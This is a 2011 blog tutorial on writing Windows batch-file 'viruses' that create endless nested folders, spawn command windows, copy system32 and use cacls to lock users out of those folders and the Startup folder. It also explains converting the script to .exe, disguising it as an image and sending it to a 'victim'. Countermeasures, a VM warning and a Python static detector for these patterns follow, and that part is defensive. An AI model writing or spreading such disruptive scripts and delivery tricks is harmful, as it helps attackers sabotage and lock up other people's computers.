Wednesday, August 31, 2011

Virus that creates folder inside folder and consumes indefinite memory

In this tutorial I will show how to create a virus using a BAT file and how to convert that .bat file to an .exe file. You may have heard the term batch programming: creating a .bat file from simple DOS commands is called batch programming. You do not need any programming knowledge to create a .bat file; you only need to know a few DOS commands.
Creating Process:-
1. Open Notepad, write the program as given in the examples below, and save it with a .bat extension.
2. Convert this .bat file to an .exe file using a "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click it. You can cover this file using an image file; Click Here to learn the hiding trick. Or you can upload this file to any file-sharing website like ziddu.com or megaupload.com and give the link to your victim.

Let's check some examples:-
Note:- In the examples below, "::" (double colons) represents a comment in batch programming. To create the batch files, follow the "Creating Process" above.

Virus that creates "folder inside folder" indefinitely.


@echo off     :: commands will not be shown on the screen 
:a                   :: here "a" is a label
md hacker   :: make a new directory named "hacker"
cd hacker     :: move the control inside the newly created "hacker" directory.
goto a            :: jump to the label "a"/loop.

This program creates a folder named "hacker" in the default location of your terminal (which can be your desktop), goes inside that folder, creates another folder, and continues indefinitely.
Hold on, this is not at all a good virus: the victim can press "ctrl+break" to stop the execution and then delete the "hacker" folder. And anyway, an empty folder cannot harm the system.

Let's check this:-


@echo off 
:a
md hacker
cacls  hacker /e /p Everyone:N   :: access denied to "hacker"
cd hacker
start cmd.exe                   :: start the new command prompt in each iteration
copy c:\windows\system32\     :: copy the contents of "system32" inside "hacker" folder
goto a

This virus may crash your hard drive. When this virus is clicked, the "hacker" folder will be created an indefinite number of times, a new cmd window will open each time, and the contents of "system32" will be copied in each iteration. The biggest plus is that the victim cannot delete the "hacker" folder. Oh!! This looks cool, now he can't do anything (if you are thinking this, you are absolutely wrong). You still haven't created a great virus: every victim possesses a great weapon to counter this virus. I call it the Bramhastra, i.e. restart the PC and everything is OK. Don't worry, I have a weapon to counter this Bramhastra.


What if we put our virus in the startup folder? Every time the system starts, the virus will run automatically. To learn how to copy a virus into the "startup" folder, Click here.


But today users are smart, and there is a chance that they may delete our virus from the startup folder, so that everything we did is in "vain" :( But hold on, I am not done yet. What if I deny the victim every permission on the startup folder, so that he can't even see the contents of the folder? All you have to do is add one line to the above program. Let's see.



@echo off 
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N                                                                        ::deny permission to startup folder
:a
md hacker
cacls  hacker /e /p Everyone:N         :: access denied to "hacker"
cd hacker
start cmd.exe                 ::start the new command prompt in each iteration
copy c:\windows\system32\         :: copy the contents of "system32" inside "hacker" folder
goto a

Now the only thing he/she can do is format the hard drive, and our job is done :).


Countermeasure:-
1. The first thing you should do is change the permissions of the "startup" folder. To do so, open cmd and type the following command:-
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:F
This gives you all permissions on the startup folder; you can then delete the virus and restart the system.
2. Use the Unlocker tool to delete a folder whose permissions are denied. Click Here to download the Unlocker tool.
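
A defender-side check for the patterns in the scripts above, as an added example that is not part of the original post: a static triage function that flags a batch file containing a `cacls ... Everyone:N` denial (noting when it targets the Startup folder) or a backward `goto` loop with no `if`/`exit` that creates directories or spawns windows. The finding names and the heuristics are assumptions chosen for this illustration, and the script under inspection is only read, never run.

```python
import re

# Heuristics below are assumptions tuned to the scripts on this page,
# not a general-purpose malware detector.
DENY_RE = re.compile(r"^\s*cacls\b.*\bEveryone:N\b", re.I)
STARTUP_RE = re.compile(r"start menu\\programs\\startup", re.I)
LABEL_RE = re.compile(r"^\s*:([A-Za-z0-9_]+)")      # ':a' but not '::comment'
GOTO_RE = re.compile(r"^\s*goto\s+:?([A-Za-z0-9_]+)", re.I)
GUARD_RE = re.compile(r"^\s*(if|exit)\b", re.I)     # anything that can end a loop

def triage(script):
    """Return a set of finding names for one batch script (static, never runs it)."""
    lines = script.splitlines()
    findings, labels = set(), {}
    for i, line in enumerate(lines):
        m = LABEL_RE.match(line)
        if m:
            labels.setdefault(m.group(1).lower(), i)
        if DENY_RE.match(line):
            hit = "deny-acl-on-startup" if STARTUP_RE.search(line) else "deny-acl"
            findings.add(hit)
    for i, line in enumerate(lines):
        m = GOTO_RE.match(line)
        start = labels.get(m.group(1).lower()) if m else None
        if start is None or start > i:
            continue                                 # not a backward jump
        body = lines[start + 1:i]
        if any(GUARD_RE.match(b) for b in body):
            continue                                 # loop has a possible exit
        cmds = {b.split()[0].lower() for b in body if b.strip()}
        if cmds & {"md", "mkdir"} and cmds & {"cd", "chdir"}:
            findings.add("unbounded-nested-mkdir-loop")
        if "start" in cmds:
            findings.add("unbounded-process-spawn-loop")
    return findings

# Constructed sample: the command sequence of the page's last script.
SAMPLE = r'''@echo off
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
md hacker
cacls hacker /e /p Everyone:N
cd hacker
start cmd.exe
goto a
'''

if __name__ == "__main__":
    print(sorted(triage(SAMPLE)))
```

A loop that contains any `if` or `exit` line is deliberately not flagged, so ordinary retry loops in administrative scripts stay quiet.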



Precaution:
Do not practice these tricks on your PC; use a virtual machine on your PC to make and run these viruses. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing VirtualBox, install XP or 7 inside it (the installing procedure is the same).
